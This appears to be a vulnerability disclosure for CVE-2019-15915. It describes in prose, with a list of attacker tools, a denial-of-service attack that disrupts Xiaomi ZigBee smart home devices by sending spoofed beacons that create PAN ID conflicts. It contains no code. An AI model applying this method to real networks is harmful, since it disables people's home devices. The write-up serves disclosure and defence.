CVE-2019-15915
Insecure discover ZigBee network procedure
Discoverer
Huang,Yang-Cheng, Lin,Hsuan-Yu , Telecom Technology Center
Description
An issue was discovered on Xiaomi DGNWG03LM, ZNCZ03LM, MCCGQ01LM, RTCGQ01LM devices. Attackers can utilize the "discover ZigBee network procedure" to perform a denial of service attack.
Xiaomi smart home devices attack demonstration
1. System architecture
The system architecture of this research attack demonstration, as shown in Figure 1, is divided into attacker and victim.
Attacker:
- Laptop(Ubuntu 16.04.3 LTS)
- Atmel RZ Raven USB sticks(2.4 GHz dongle)
- KillerBee (Research mainly modifies the KillerBee API)
- Zigdiggity
- Wireshark
Victim:
The environment of the victims is that the gateway acts as a ZigBee coordinator and is responsible for accessing the Internet, establishing a ZigBee network, and connecting to the end devices and router. The users obtain the messages or control of the end devices or router by using smart devices(e.g.:smart phone…). The victim devices of this attack demonstration use Xiaomi smart home devices. Their model:
- Gateway acts as ZigBee coordinator:DGNWG03LM
- Router:ZNCZ03LM
- End device:MCCGQ01LM
- End device:RTCGQ01LM
2 Denial of Service Attack - Insecure discover ZigBee network procedure
The attackers send the Beacon request packet, and wait for the victim coordinator to return the Beacon packet to obtain the current personal area network identifier of the ZigBee network and extended personal area network identifier, as shown in Figure 2.
Attackers send the fake beacon packets, the format containing with the current ZigBee network's same personal area network identifier, but the different extended personal area network identifier. The current ZigBee network will detect personal area network identifier conflicts. The user control ZNCZ03LM's response will be slow or unresponsive. If attackers use multiple attack devices, it maybe cause a denial of service attack. And the other smart home devices will stop responding after a period of attack, causing a denial of service attack, as shown in Figure 3 and Figure 4.



